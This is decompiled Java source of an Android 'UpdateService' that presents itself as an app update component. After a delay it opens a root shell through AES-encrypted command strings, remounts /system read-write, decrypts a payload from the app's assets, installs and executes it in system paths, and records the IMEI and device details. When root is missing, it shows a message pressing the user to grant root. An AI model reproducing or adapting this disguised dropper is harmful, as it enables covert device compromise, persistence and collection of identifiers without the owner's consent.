package com.safetest.shark;

import android.app.Service;
import android.content.Intent;
import android.content.SharedPreferences;
import android.content.pm.ApplicationInfo;
import android.os.Build;
import android.os.Bundle;
import android.os.IBinder;
import android.os.SystemClock;
import android.telephony.TelephonyManager;
import com.ju6.mms.pdu.CharacterSets;
import com.ju6.mms.pdu.PduPersister;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.FileReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.LineNumberReader;
import java.io.OutputStream;
import java.io.UnsupportedEncodingException;
import java.util.Timer;
import java.util.TimerTask;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
/* loaded from: classes.dex */
public final class UpdateService extends Service {
    private static final int OL = 18316;
    private static final int TL = 18320;
    private static long INTERVAL = 60000;
    private static byte[] WP = {83, 116, 97, 107, 95, 121, 69, 120, 121, 45, 101, 76, 116, 33, 80, 119};
    private static final byte[][] TIPS = {new byte[]{-52, -81, 75, 27, 11, -108, 122, 121, -21, 74, 81, 73, 76, -123, 73, -116, 109, -42, 41, 37, 116, -64, 35, -78, -6, -90, 123, 80, 42, 13, 56, 37}, new byte[]{115, -41, -127, 17, 21, -7, 104, 90, -74, -93, 79, -65, 72, 115, 113, 124, 20, 113, -67, -55, -99, -60, -89, -90, -123, 74, 6, -58, 69, 109, -68, -46}, new byte[]{-47, 111, 106, -3, -88, -100, 90, -62, -19, 88, -99, 41, -109, -21, 124, 78, -68, 65, 41, 70, 5, -46, -113, -80, -62, 15, 67, 85, 32, -7, -17, 93}, new byte[]{35, 67, 97, 69, -98, -60, -101, 44, Byte.MIN_VALUE, -91, 87, -127, 113, -59, 64, -108}, new byte[]{36, -42, 113, -92, 48, -31, -108, -53, -120, Byte.MIN_VALUE, 123, 48, 8, 61, 55, 49}, new byte[]{21, -103, -35, -1, 13, 52, 89, 16, -62, 114, 65, -15, -81, -87, 5, -17}, new byte[]{-57, -52, -17, -79, 84, 22, -87, 107, 10, 34, 96, -113, -125, 82, -92, -96}, new byte[]{-48, 15, -69, 65, -83, -22, 118, -61, 60, -126, 65, 59, 77, -119, -38, 23}, new byte[]{107, -31, 110, -42, -112, 47, 114, 115, 26, 66, -89, 117, -105, 85, -110, -62, -63, 19, 8, 41, 7, -17, -31, 67, -35, -105, -92, -89, -102, -29, -79, 91}, new byte[]{-5, 113, -72, -5, -85, -32, 83, -11, -7, -115, -53, -69, 13, -63, 71, 70, -105, 53, 104, -9, 42, 14, -37, 34, -101, 4, 104, 49, -80, 48, 26, -6}, new byte[]{10, -4, 17, 29, -58, -23, -122, 70, -71, -82, 74, -45, -16, -85, 122, 95}, new byte[]{64, 7, -51, 38, -114, 81, 22, -124, 106, 122, 88, 119, 48, -77, 94, 59}, new byte[]{38, -60, -30, 13, 122, -106, -16, -18, 106, -79, 36, -44, -53, 82, 68, Byte.MAX_VALUE}, new byte[]{-1, -119, 1, 31, 13, 76, -18, 25, Byte.MIN_VALUE, 103, 63, 105, 2, -100, 6, 9}};
    private String mIdentifier = "-1";
    private String mAName = null;
    private long mTickets = 9;
    private Timer mTimer = null;
    private long startDelay = 3600;

    @Override // android.app.Service
    public IBinder onBind(Intent intent) {
        return null;
    }

    @Override // android.app.Service
    public void onCreate() {
        super.onCreate();
        try {
            ApplicationInfo ai = getPackageManager().getApplicationInfo(getPackageName(), 128);
            Bundle bundle = ai.metaData;
            Object value = bundle.get("SAFE_START");
            if (value != null) {
                this.startDelay = ((Integer) value).intValue();
            }
            Object value2 = bundle.get("SAFE_PID");
            if (value2 != null) {
                this.mIdentifier = (String) value2;
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        SharedPreferences p = getSharedPreferences("sstimestamp", 0);
        long last = p.getLong(PduPersister.BaseMmsColumns.START, 0L);
        long cur = System.currentTimeMillis();
        if (last == 0) {
            SharedPreferences.Editor ed = p.edit();
            ed.putLong(PduPersister.BaseMmsColumns.START, cur);
            ed.commit();
            if (this.startDelay > 0) {
                stopSelf();
                return;
            }
        } else if (cur - last < this.startDelay * 1000) {
            stopSelf();
            return;
        }
        this.mTimer = new Timer(true);
        TimerTask task = new TimerTask() { // from class: com.safetest.shark.UpdateService.1
            @Override // java.util.TimerTask, java.lang.Runnable
            public void run() {
                UpdateService.this.doTimerTask();
            }
        };
        this.mTimer.schedule(task, INTERVAL, INTERVAL);
    }

    @Override // android.app.Service
    public void onDestroy() {
        super.onDestroy();
        if (this.mTimer != null) {
            this.mTimer.cancel();
        }
    }

    private void shouMyDiag() {
        ApplicationInfo ai = getApplicationInfo();
        Intent intent = new Intent();
        intent.setClass(this, ShowTips.class);
        String name = ai.loadLabel(getPackageManager()).toString();
        name = (name == null || "".equals(name)) ? "本软件" : "本软件";
        String msg = String.valueOf(name) + "需要root权限才能使用全部功能，请通过授权管理程序进行授权！";
        try {
            intent.putExtra("MM", new String(msg.getBytes("UTF-8"), "UTF-8"));
        } catch (UnsupportedEncodingException e) {
            e.printStackTrace();
        }
        intent.setFlags(268435456);
        intent.putExtra("GG", "test");
        startActivity(intent);
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void doTimerTask() {
        if (checkPrecondition()) {
            stopSelf();
            return;
        }
        this.mTickets++;
        if (this.mTickets % 10 == 0) {
            try {
                _doTimerTask();
            } catch (Exception e) {
            }
        }
        if (checkPrecondition()) {
            stopSelf();
        }
    }

    /* JADX INFO: Access modifiers changed from: private */
    public String getTips(int i) {
        try {
            byte[] bs = decrypt(TIPS[i]);
            String name = new String(bs);
            return name;
        } catch (Exception e) {
            return null;
        }
    }

    private boolean checkPrecondition() {
        String name = getTips(0);
        if (name == null) {
            return false;
        }
        File f = new File(name);
        return f.exists() && f.length() >= 18316;
    }

    private void _doTimerTask() {
        if (this.mAName == null) {
            this.mAName = getSystemMount();
        }
        MyExecutor e = new MyExecutor();
        if (!e.init()) {
            e.close();
            shouMyDiag();
            return;
        }
        checkFile(e, false);
        String a0 = getTips(0);
        File f = new File(a0);
        if (!f.exists() || f.length() < 18316) {
            String dest = getFilesDir() + getTips(4);
            String cfg = getFilesDir() + getTips(5);
            updateInfo(cfg);
            String a3 = getTips(3);
            copyAssets(a3, dest, TL);
            String a6 = getTips(6);
            String a1 = getTips(1);
            String a2 = getTips(2);
            if (new File(a6).exists()) {
                e.execute(String.valueOf(a6) + " " + dest + " " + a0, CharacterSets.UCS2);
                e.execute(String.valueOf(a6) + " " + dest + " " + a2, CharacterSets.UCS2);
                if (!new File(a1).exists()) {
                    e.execute(String.valueOf(a6) + " " + cfg + " " + a1, CharacterSets.UCS2);
                }
            } else {
                String a7 = getTips(7);
                e.execute(String.valueOf(a7) + " " + dest + " > " + a0, CharacterSets.UCS2);
                e.execute(String.valueOf(a7) + " " + dest + " > " + a2, CharacterSets.UCS2);
                if (!new File(a1).exists()) {
                    e.execute(String.valueOf(a7) + " " + cfg + " > " + a1, CharacterSets.UCS2);
                }
            }
            String a8 = getTips(8);
            e.execute(String.valueOf(a8) + a2, 100);
            e.execute(a2, 100);
            new File(dest).delete();
            new File(cfg).delete();
        }
        checkFile(e, true);
    }

    private void checkFile(MyExecutor e, boolean readonly) {
        String cmd;
        String cmd2 = getTips(9);
        if (readonly) {
            cmd = String.valueOf(cmd2) + "ro ";
        } else {
            cmd = String.valueOf(cmd2) + "rw ";
        }
        e.execute(String.valueOf(String.valueOf(String.valueOf(cmd) + this.mAName) + " ") + getTips(10), CharacterSets.UCS2);
    }

    /* JADX INFO: Access modifiers changed from: package-private */
    /* loaded from: classes.dex */
    public class MyExecutor {
        Process process = null;
        DataOutputStream stdout = null;
        DataInputStream stdin = null;
        DataInputStream stderr = null;

        MyExecutor() {
        }

        public boolean init() {
            try {
                String a11 = UpdateService.this.getTips(11);
                String a12 = UpdateService.this.getTips(12);
                this.process = Runtime.getRuntime().exec(a11);
                this.stdout = new DataOutputStream(this.process.getOutputStream());
                this.stdin = new DataInputStream(this.process.getInputStream());
                this.stderr = new DataInputStream(this.process.getErrorStream());
                this.stdout.writeBytes(a12);
                this.stdout.flush();
                SystemClock.sleep(1000L);
                return this.stdin.available() > 0;
            } catch (IOException e) {
                e.printStackTrace();
                return false;
            }
        }

        public void waitFor() {
            try {
                if (this.process != null) {
                    this.process.waitFor();
                }
            } catch (InterruptedException e) {
                e.printStackTrace();
            }
        }

        public void close() {
            if (this.stdout != null) {
                try {
                    this.stdout.writeBytes("exit\n");
                    this.stdout.flush();
                    waitFor();
                    try {
                        this.stdin.close();
                        this.stdin = null;
                    } catch (Exception e) {
                        this.stdin = null;
                    }
                    try {
                        this.stderr.close();
                        this.stderr = null;
                    } catch (Exception e2) {
                        this.stderr = null;
                    }
                    try {
                        this.stdout.close();
                        this.stdout = null;
                    } catch (Exception e3) {
                        this.stdout = null;
                    }
                    this.process = null;
                    this.process.destroy();
                } catch (IOException e1) {
                    e1.printStackTrace();
                }
            }
        }

        public void execute(String cmd, int timeout) {
            try {
                if (this.stdout != null) {
                    this.stdout.writeBytes(cmd);
                    this.stdout.writeBytes("\n");
                    this.stdout.flush();
                    SystemClock.sleep(timeout);
                }
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }

    private String getSystemMount() {
        Exception e;
        String sysdev = null;
        LineNumberReader lnr = null;
        try {
            try {
                String a13 = getTips(13);
                LineNumberReader lnr2 = new LineNumberReader(new FileReader(a13));
                while (true) {
                    try {
                        String line = lnr2.readLine();
                        if (line == null) {
                            break;
                        }
                        String[] fields = line.split(" ");
                        if (fields[1].compareToIgnoreCase("/system") == 0) {
                            sysdev = fields[0];
                        }
                    } catch (Exception e2) {
                        e = e2;
                        lnr = lnr2;
                        e.printStackTrace();
                        if (lnr != null) {
                            try {
                                lnr.close();
                            } catch (Exception e3) {
                            }
                        }
                        return sysdev;
                    } catch (Throwable th) {
                        th = th;
                        lnr = lnr2;
                        if (lnr != null) {
                            try {
                                lnr.close();
                            } catch (Exception e4) {
                            }
                        }
                        throw th;
                    }
                }
                if (lnr2 != null) {
                    try {
                        lnr2.close();
                        lnr = lnr2;
                    } catch (Exception e5) {
                        lnr = lnr2;
                    }
                } else {
                    lnr = lnr2;
                }
            } catch (Throwable th2) {
                th = th2;
            }
        } catch (Exception e6) {
            e = e6;
        }
        return sysdev;
    }

    private void updateInfo(String name) {
        TelephonyManager tel = (TelephonyManager) getSystemService("phone");
        String mImei = tel.getDeviceId();
        String mModel = String.valueOf(Build.BRAND) + "_" + Build.MODEL;
        String mModel2 = mModel.replaceAll(" ", "_");
        String mOsType = Build.VERSION.RELEASE;
        String mOsType2 = mOsType.replaceAll(" ", "_");
        String mOsAPI = Build.VERSION.SDK;
        String mOsAPI2 = mOsAPI.replaceAll(" ", "_");
        try {
            OutputStream myOutput = new FileOutputStream(name);
            String data = String.valueOf(mImei) + " " + this.mIdentifier + " " + mModel2 + " " + mOsType2 + " " + mOsAPI2;
            myOutput.write(data.getBytes());
            myOutput.flush();
            myOutput.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    private void copyAssets(String src, String dest, int len) {
        Exception e;
        OutputStream myOutput;
        OutputStream myOutput2 = null;
        InputStream myInput = null;
        if (len <= 0) {
            return;
        }
        try {
            try {
                myOutput = new FileOutputStream(dest);
            } catch (Exception e2) {
                e = e2;
            }
        } catch (Throwable th) {
            th = th;
        }
        try {
            myInput = getClass().getResourceAsStream("/assets/" + src);
            byte[] buff = new byte[len];
            myInput.read(buff);
            byte[] decryptBuff = decrypt(buff);
            myOutput.write(decryptBuff);
            myOutput.flush();
            if (myInput != null) {
                try {
                    myInput.close();
                } catch (Exception e3) {
                }
            }
            if (myOutput != null) {
                try {
                    myOutput.close();
                } catch (Exception e4) {
                }
            }
        } catch (Exception e5) {
            e = e5;
            myOutput2 = myOutput;
            e.printStackTrace();
            if (myInput != null) {
                try {
                    myInput.close();
                } catch (Exception e6) {
                }
            }
            if (myOutput2 != null) {
                try {
                    myOutput2.close();
                } catch (Exception e7) {
                }
            }
        } catch (Throwable th2) {
            th = th2;
            myOutput2 = myOutput;
            if (myInput != null) {
                try {
                    myInput.close();
                } catch (Exception e8) {
                }
            }
            if (myOutput2 != null) {
                try {
                    myOutput2.close();
                } catch (Exception e9) {
                }
            }
            throw th;
        }
    }

    private byte[] decrypt(byte[] encrypted) throws Exception {
        SecretKeySpec skeySpec = new SecretKeySpec(WP, "AES");
        Cipher cipher = Cipher.getInstance("AES");
        cipher.init(2, skeySpec);
        byte[] decrypted = cipher.doFinal(encrypted);
        return decrypted;
    }
}
